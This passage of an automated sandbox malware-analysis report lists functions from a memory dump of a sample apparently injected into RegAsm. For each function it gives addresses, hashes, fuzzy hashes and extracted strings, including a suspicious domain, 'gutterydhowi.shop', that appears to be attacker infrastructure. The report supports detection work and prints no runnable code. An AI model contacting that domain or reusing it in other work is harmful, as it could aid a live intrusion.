Opcode ID: a38601d3fca04be0643588d29395e0164f5203bdcff9d00cb4cb4415e9c9f1d7
Instruction ID: 95a8a3ba117dcb61b299199237c9eeeb104e0e6ef4a4d217e90056a207d5ce29
Opcode Fuzzy Hash: a38601d3fca04be0643588d29395e0164f5203bdcff9d00cb4cb4415e9c9f1d7
Instruction Fuzzy Hash: A7E1ACB5D00269DBDF04CFD4E881AEEBBB1BF06304F640859E850AB346D3759A45CBA9

Function 0042FE26 Relevance: 4.1, Strings: 3, Instructions: 362COMMON

Download Yara Rule

Strings

4`[b, xrefs: 004301C0
((*, xrefs: 0042FFED
KJML, xrefs: 00430183, 0043018B

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ((*$4`[b$KJML
API String ID: 0-1972290462
Opcode ID: 85170ad6c301ac33b82bc9fa6970ddb97d6213decdd9db29ee1bd33b2223b23e
Instruction ID: fe7f7a316f197fe0042526b9999b7c3ec2d399551d2672056d428c2cb04b8ed6
Opcode Fuzzy Hash: 85170ad6c301ac33b82bc9fa6970ddb97d6213decdd9db29ee1bd33b2223b23e
Instruction Fuzzy Hash: ADC10371E00205CFDF09CFA8D851BAEBBB2EF4A305F248269E415B7392D7399945CB58

Function 00421AD0 Relevance: 3.0, Strings: 2, Instructions: 527COMMON

Download Yara Rule

Strings

fL[D, xrefs: 00421ED8
wcjn, xrefs: 00421F03, 00421F0B

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: fL[D$wcjn
API String ID: 0-3212404223
Opcode ID: f7381f910d54b45702fc34180e1fe2687b4c52f9d4af3e67fb7e363e571e8373
Instruction ID: f42574bc615607f6af951fa0bda80222cba276cb5f891ef9b4a55e7d3f85a151
Opcode Fuzzy Hash: f7381f910d54b45702fc34180e1fe2687b4c52f9d4af3e67fb7e363e571e8373
Instruction Fuzzy Hash: CF029C75608350ABD311EF25E841B2FBBE4AF95308F44492EF5C897262D239E914CB9B

Function 0042CAD0 Relevance: 2.8, Strings: 2, Instructions: 344COMMON

Download Yara Rule

Strings

w, xrefs: 0042CE40
KJML, xrefs: 0042CBB3, 0042CBBB

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: KJML$w
API String ID: 2994545307-3028343826
Opcode ID: bd99757a9c63034eb64c56ddee33b2aa73c3b09942c8a762cdb718a48a13f839
Instruction ID: 080b7696ce438855e2865b836230b873bea6a0c21e24f15a690f1c4f281cc9ae
Opcode Fuzzy Hash: bd99757a9c63034eb64c56ddee33b2aa73c3b09942c8a762cdb718a48a13f839
Instruction Fuzzy Hash: B0B101706083118BE714DF25E881B2FBBE1EF96314F54492EE5C997352E339E844CB9A

Function 00440A70 Relevance: 2.8, Strings: 2, Instructions: 277COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00440DA0
4`[b, xrefs: 00440C00

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$4`[b
API String ID: 0-3640500014
Opcode ID: d015d15252007465af4dfc1d6674f062de2066a95aacb490fbb4145584b27ade
Instruction ID: 4a5db5bc531862a3fafa49679c1da16283dda6f39ad5b5a5d790b33b14943aa6
Opcode Fuzzy Hash: d015d15252007465af4dfc1d6674f062de2066a95aacb490fbb4145584b27ade
Instruction Fuzzy Hash: 3081D3B160C3409BE710DF65E981B2FB7E5EB85709F04482DF6C487252D739E824CB6A

Function 004452E0 Relevance: 1.9, Strings: 1, Instructions: 662COMMON

Download Yara Rule

Strings

f, xrefs: 004454BB

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: ecde4e0f9d81017bb06cdb8f77f06a8ed7ff8d5b70e0e7afd6763affab39131a
Instruction ID: 69f14e0446ed55d0bc363b11fecc12665fd0227c7f6396fa499844b82b808001
Opcode Fuzzy Hash: ecde4e0f9d81017bb06cdb8f77f06a8ed7ff8d5b70e0e7afd6763affab39131a
Instruction Fuzzy Hash: 5D32AF716087419FEB14CF18C880B2FBBE1ABC8354F58892EF895973A2D778D845CB56

Function 00413EEC Relevance: 1.8, Strings: 1, Instructions: 559COMMON

Download Yara Rule

Strings

p9A, xrefs: 004140B0

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: p9A
API String ID: 0-2767146494
Opcode ID: cc4438e265543dc60c17e4af3816322dfc04a26b990f0c8e12e52939bdc12f3d
Instruction ID: 2c8aa80ce659a15c762eb3e1e81ca8c73c00eafc5f89e39574f9bbbba22e0185
Opcode Fuzzy Hash: cc4438e265543dc60c17e4af3816322dfc04a26b990f0c8e12e52939bdc12f3d
Instruction Fuzzy Hash: 5812BCB5500B008FD725CF24D980B67B7F2AF86309F14892ED49A87B92E739F845CB59

Function 00426FC0 Relevance: 1.7, APIs: 1, Instructions: 245comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0044EB80,00000000,00000001,0044EB70), ref: 00426FE9

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 6b857c024720ac7b7e352e76ddfa4817e7e42bf3c285e39b0cfbbb18e45e5121
Instruction ID: 6c14e4c9a293253992b80aceda0b72b65ad673230c86ebd3f60838f3fce4d3ea
Opcode Fuzzy Hash: 6b857c024720ac7b7e352e76ddfa4817e7e42bf3c285e39b0cfbbb18e45e5121
Instruction Fuzzy Hash: DE61FEB03082209BDB209B24DC96B7733A4EF82358F144559F986CB390E379E809C76A

Function 004314A0 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

", xrefs: 00431788

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 3a375ffb791029574d5d487153f84a713dd1c5f8a93d4cec6e8116d322515391
Instruction ID: dac99c5dab73986a5260e87837a74846541daf9fe20671a14200a52273f6332c
Opcode Fuzzy Hash: 3a375ffb791029574d5d487153f84a713dd1c5f8a93d4cec6e8116d322515391
Instruction Fuzzy Hash: CCC159B2A043045BD7148F24C49176BB7E9AF89354F1C9A2FE895873A1D73CDC44C79A

Function 0040F807 Relevance: 1.6, Strings: 1, Instructions: 390COMMON

Download Yara Rule

Strings

gutterydhowi.shop, xrefs: 0040F50E

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: gutterydhowi.shop
API String ID: 0-3708922491
Opcode ID: 12b76bd1cddf45bbd6207310afd8c4b1868e0259217c3cf0ed6db9d5703ced3b
Instruction ID: cd89484c1d0e19e46c954de61e31bbebaec41b12b1ade970bd1187d44bb00fae
Opcode Fuzzy Hash: 12b76bd1cddf45bbd6207310afd8c4b1868e0259217c3cf0ed6db9d5703ced3b
Instruction Fuzzy Hash: B8C11574904256CFCB25CF68C8506BFB7B1FF46300F18497AE451AB792D339A85ACB98

Function 00449620 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

P, xrefs: 004497C7

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 8839f7c265b375e9006fe6bdeca6ed09c35eeeec3042cf69133b77c92ed646e7
Instruction ID: dd4241a5a5a1caa29915f85dd6641d1f89e5dc2f7704d5486d9f392ef1a7eae6
Opcode Fuzzy Hash: 8839f7c265b375e9006fe6bdeca6ed09c35eeeec3042cf69133b77c92ed646e7
Instruction Fuzzy Hash: E9D104329082714FE725CE18989071FB6E1EB85718F168A3DE8B5AB381CB75DC06D7C6

Function 0042DFE0 Relevance: 1.6, Strings: 1, Instructions: 313COMMON

Download Yara Rule

Strings

2B, xrefs: 0042E224

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 2B
API String ID: 0-2489582833
Opcode ID: e7c9954c64a2a2e716abb4006260575443ff31ca00f66fa76071335e070d8145
Instruction ID: 1648f17e86a6f30225877104b632deb72bbb2998103f50de6865a7bf14004587
Opcode Fuzzy Hash: e7c9954c64a2a2e716abb4006260575443ff31ca00f66fa76071335e070d8145
Instruction Fuzzy Hash: 26A15731608391DFD3158F39EC5132A7BE2BF8A312F0986BDE491873A2D739DA458B05

Function 00434629 Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

?*$2, xrefs: 0043413A
CIBH, xrefs: 004348CB
)FC, xrefs: 00433FD1, 004341EA, 004341F0
{vry, xrefs: 00433B15
drG, xrefs: 00433CE5

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: drG$)FC$?*$2$CIBH${vry
API String ID: 0-1492907507
Opcode ID: bc606f07fc9a9b37c0bbc1281e8971c1ba7d3ec63685693cc84bf1c889e06ed2
Instruction ID: cd923c6c2a59a948de96ec4fde7e4145b598f3882073ecf6b485000af5a54b7d
Opcode Fuzzy Hash: bc606f07fc9a9b37c0bbc1281e8971c1ba7d3ec63685693cc84bf1c889e06ed2
Instruction Fuzzy Hash: 40B15C70404B818AE776CF39C490BE3BBE0AF5A304F44589ED4EA87792DB3AB445CB55

Function 00448D80 Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00448F90

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 4`[b
API String ID: 2994545307-3962175265
Opcode ID: af7cd8dfb4bab7b1b939c1d02885cf64ec67f89fa43523cb43bc70e1759908ab
Instruction ID: 65037cb4b131e6f69ae25d9d0f844069ac1afd20bdace3c3e68c66be08e3ab69
Opcode Fuzzy Hash: af7cd8dfb4bab7b1b939c1d02885cf64ec67f89fa43523cb43bc70e1759908ab
Instruction Fuzzy Hash: 3291C371608341ABF720DB15DC41B6FB7E6EB85354F54882EF98487352EB34E840DB9A

Function 0040F7E3 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

gutterydhowi.shop, xrefs: 0040F50E

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: gutterydhowi.shop
API String ID: 0-3708922491
Opcode ID: 6bc8c1bd5ce96e5f68242ff809a3884e59ac652b41232c3f29468b36261b81fa
Instruction ID: 70c147ec3628391604478acdee8e0d2f37a7db2c632e37ade1ef48e142da4b81
Opcode Fuzzy Hash: 6bc8c1bd5ce96e5f68242ff809a3884e59ac652b41232c3f29468b36261b81fa
Instruction Fuzzy Hash: 8E711075A142158BCB25CF68C8502BFB7B2BF9A301F18457AD841A77E2D3399809CB58

Function 00448B90 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00448D40

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: a12ae3a26df7be4c76405ef57905c65d5fa8d4cf411352c140a33a637fd150d3
Instruction ID: c5202ddbdcec288203f215c2c9f34064d5f6e2a8da8471ef5e17f24a05bd36fb
Opcode Fuzzy Hash: a12ae3a26df7be4c76405ef57905c65d5fa8d4cf411352c140a33a637fd150d3
Instruction Fuzzy Hash: DB511371A09310ABEB159B189C90B3FB7E5EB89314F148A2DF8E5573E1CA35EC01C75A

Function 0040F63A Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

gutterydhowi.shop, xrefs: 0040F50E

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: gutterydhowi.shop
API String ID: 0-3708922491
Opcode ID: 05d69a286e2430bbf8d7d29ed6800b71f8178752ddf9001bef238cf64567d83a
Instruction ID: 305a687461efa61535f20c4e30c50516a1adfbbcd579c48b290b171d3c892896
Opcode Fuzzy Hash: 05d69a286e2430bbf8d7d29ed6800b71f8178752ddf9001bef238cf64567d83a
Instruction Fuzzy Hash: BD413835A04210CFCB29CF28D8903BEB3B2FF5A311F18417AD801A7792D739A845C759

Function 00425030 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

@QB, xrefs: 0042513A

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: @QB
API String ID: 0-3030980731
Opcode ID: fa7d8ae5b693dd60f6850cd017a17b0abae062ab4b2c1048713c2209d971f0dc
Instruction ID: 6d0cb73502d01e38b06274afbc8596ab77b17627c4c691baab7245b414bc2194
Opcode Fuzzy Hash: fa7d8ae5b693dd60f6850cd017a17b0abae062ab4b2c1048713c2209d971f0dc
Instruction Fuzzy Hash: C8219F74A093109BC310AB18D851A3BB7F5EF93755F848A1DE4D59B392E338CD10CBA6

Function 0044B320 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

@, xrefs: 0044B370

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 4e40ba8bf7269950f3de90b7a094009b82e9a869b5ebd9459ae0b40d5b25d8b7
Instruction ID: a91349f1e9a40293b62091c3c1e01b002cddce6e5b6639776973f8a2a5a102dc
Opcode Fuzzy Hash: 4e40ba8bf7269950f3de90b7a094009b82e9a869b5ebd9459ae0b40d5b25d8b7
Instruction Fuzzy Hash: 493156705093009BE714DF25D980A2BFBF9FF8A314F14892DF9C897252D339D9048BAA

Function 0040C1C0 Relevance: .8, Instructions: 778COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4631f2e57031adde87b200ba4790210232e1e318b6d81c4360bce7a359158444
Instruction ID: 956be2415fbe3cf17e3c2b9217a92116aac390c51ce612f86c4722e2567f76f6
Opcode Fuzzy Hash: 4631f2e57031adde87b200ba4790210232e1e318b6d81c4360bce7a359158444
Instruction Fuzzy Hash: BF42B331508315CBC725DF18E88026BB3E2FFD4314F258A3ED996A7385D739A951CB8A

Function 00407450 Relevance: .7, Instructions: 658COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4890b7e1405b60d2036cc250fc21e402b4f197dab0f25acee06565f4f699a01d
Instruction ID: e9f524300c54591016e612151c2e6d16e79c1b555d40a7684eed9594cd61b04f
Opcode Fuzzy Hash: 4890b7e1405b60d2036cc250fc21e402b4f197dab0f25acee06565f4f699a01d
Instruction Fuzzy Hash: 9152B331A0C3458FCB15CF24C0906AABBE1BF85314F19897EE89A67391D778E945CF86

Function 0044A510 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a7a94d621f91307b6425b2df28a6db3f3defc87c09105d060c306e6a5a959a9
Instruction ID: 12bdd899994ea3f390c2677d5a8b46d1064a99c9932b785e2cc315b4497e3188
Opcode Fuzzy Hash: 0a7a94d621f91307b6425b2df28a6db3f3defc87c09105d060c306e6a5a959a9
Instruction Fuzzy Hash: EFB1BE31A09254DFD704DF28D99166EB7F1FB8A312F0A8829E889D7352D335ED20CB95

Function 00449D22 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfd3633d6ed618898280b2bfa9fcdb0017dbfca5d3d0489a1ceccd4b7ddeeab4
Instruction ID: ba77fbe9a575c5c0e3916e552f8b9e900528f4925402827c04f08fa9a54957d4
Opcode Fuzzy Hash: bfd3633d6ed618898280b2bfa9fcdb0017dbfca5d3d0489a1ceccd4b7ddeeab4
Instruction Fuzzy Hash: 6FB1BA76A04316CFDB00CF64E8A466EB7B1FB4A302F194869D9019B362D3349854DB95

Function 004142E4 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b39d16f317e8d19da953c30fd6ba31bcb37fca65e178eef6612cf70bcdbf204
Instruction ID: 777062db379b90a3490bb9d039b80cdec0e37db8c352507ae385cde0aeea2dbb
Opcode Fuzzy Hash: 4b39d16f317e8d19da953c30fd6ba31bcb37fca65e178eef6612cf70bcdbf204
Instruction Fuzzy Hash: 3AB159B4500B419FD3218F24CA80B67BBF5FF46705F04891DE8AA97A91E339F854CB69

Function 0044B430 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0dda43ae28496b58a7ef3ddbc7ecac972836593531f61fb537fa466d96248cf
Instruction ID: 71323470c014a4a126a73179cc5a1ef60c16c30d165a2ed76876cba0ed87e0d4
Opcode Fuzzy Hash: e0dda43ae28496b58a7ef3ddbc7ecac972836593531f61fb537fa466d96248cf
Instruction Fuzzy Hash: 0181C0706083019BE7109F68D880A2FB7E6FF95744F25882DE5C58B362D739EC54CB9A

Function 00445DE0 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 161dde24520697c1f0b729146d0885cd9b1b14967a11ed721bd29b2f76a8329d
Instruction ID: b5ff81ec9e9af75986a4fac7fb74df821215003c5149bce377154884bf3d8d24
Opcode Fuzzy Hash: 161dde24520697c1f0b729146d0885cd9b1b14967a11ed721bd29b2f76a8329d
Instruction Fuzzy Hash: B561E030608701ABEB10DF15D880B2BF7E6EB85314F24892EF59887362D739EC55CB5A

Function 00444970 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e8410b053a2cc03e8267f3a8188584c86f567d44663b6a5e23fecc97df7b06
Instruction ID: dc97e09a7f7da624c8807c98710862b4dce587ce3812b6c05e15904d13e63158
Opcode Fuzzy Hash: 15e8410b053a2cc03e8267f3a8188584c86f567d44663b6a5e23fecc97df7b06
Instruction Fuzzy Hash: 31518F716083409BE714DF29D880B2FB7E5EB85325F14892EF58497352C739E8148BAA

Function 00444BC0 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed095be0ec8c026400a107d1cab00e777ad572313e8e3e7afe1d6cba256e9fc0
Instruction ID: dec6aa83464d3b4264dd44e35dd919ff3509ff86f22b815f22340c26f882f573
Opcode Fuzzy Hash: ed095be0ec8c026400a107d1cab00e777ad572313e8e3e7afe1d6cba256e9fc0
Instruction Fuzzy Hash: 8951B3746092009BEB24DF55E980B2BB7E6EBC5305F18882EF4C587321D739DC10CB6A

Function 00405CF0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b49a934ef247a52156d8ec0288b7fb744e74ccf73bfd21c8170fa558b5e02194
Instruction ID: a93e7bb16f79f5bee52f37b023afbee245ecc507bf95419d7e2d32b41e93770e
Opcode Fuzzy Hash: b49a934ef247a52156d8ec0288b7fb744e74ccf73bfd21c8170fa558b5e02194
Instruction Fuzzy Hash: 8E51A0B5A046009FC714DF14C480927B7A1FF89328F15467EE899AB392D635ED42CFDA

Function 0044B010 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1f0316f3393f190ccd40142f6c8b68cc3853d850750d4fdd77fecf1086e8afb
Instruction ID: 67ff51331bc586e3258e30a007c696559b29967afb165d85162e472efda89275
Opcode Fuzzy Hash: c1f0316f3393f190ccd40142f6c8b68cc3853d850750d4fdd77fecf1086e8afb
Instruction Fuzzy Hash: AB41CF74208300ABE7149F24DD91B2FB7E6EB85755F24882DF58897352D339EC10CB9A

Function 0044B1A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 302deb0443edf5660be99377dc82e965bc1882d97704a0ff0b743b8059469850
Instruction ID: 7bb1e064a9e3fe809587a2e583d5bbbc0ac817289a77bfc4f351f9a1e2f1ca79
Opcode Fuzzy Hash: 302deb0443edf5660be99377dc82e965bc1882d97704a0ff0b743b8059469850
Instruction Fuzzy Hash: F741AF34208300ABE7149F25ED94B2FB7E6FB85715F14886DF88957351D379E810CB9A

Function 00435519 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e24e261311531be54728c1f7de490a8c5844de532af9053c9630d86519809ba
Instruction ID: 7a9764bf3efe6304778dabb77bcc631861f8f1a38c5e90041bb2cad766b257b8
Opcode Fuzzy Hash: 7e24e261311531be54728c1f7de490a8c5844de532af9053c9630d86519809ba
Instruction Fuzzy Hash: 11416A72505F418FC324CB29C491363B7E2AF59324F699A1EC4AA47B91E338F805CB59

Function 00414692 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a6c332c5d3211bb44ff9af79ab587ffb2f10c5d39c5de35afcf0ad077f2112
Instruction ID: a376e7b36b3188e4cd9addea55493a65cc0f09d2769b96ef42937a54c16a89e2
Opcode Fuzzy Hash: 57a6c332c5d3211bb44ff9af79ab587ffb2f10c5d39c5de35afcf0ad077f2112
Instruction Fuzzy Hash: 02313EB4500B009BD735CF24C480AA3BBF5BB59300F154A2ED49787752E779F989CB99

Function 0043FE90 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0085e10853b1e2969aa1028db42883cbeaeadcd86b2518a4c6ae1f0978dd0f
Instruction ID: a7d9893a673cfc8e199ffc65db64a738f37302f500c8e91188f8a16d540f37a9
Opcode Fuzzy Hash: 9f0085e10853b1e2969aa1028db42883cbeaeadcd86b2518a4c6ae1f0978dd0f
Instruction Fuzzy Hash: 9C210332D082104BC3249B59848152BF7E5EB9E704F16A62FED84973A5E3389C1887EA

Function 00404CB0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 609c9fe2b85b6fa7177e1b6ed724a188d16551f5cddb16224451ebaab9e6e429
Instruction ID: d5cb594caa8decbb0462b1d43e6d8ce9a9ace7f061841147579c4ba8b6174a16
Opcode Fuzzy Hash: 609c9fe2b85b6fa7177e1b6ed724a188d16551f5cddb16224451ebaab9e6e429
Instruction Fuzzy Hash: 5131BBB16042009BD7149F19D88092BB7E1EFC4319F14493EE999AB3D5D339EC42CB4A

Function 0043BFF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

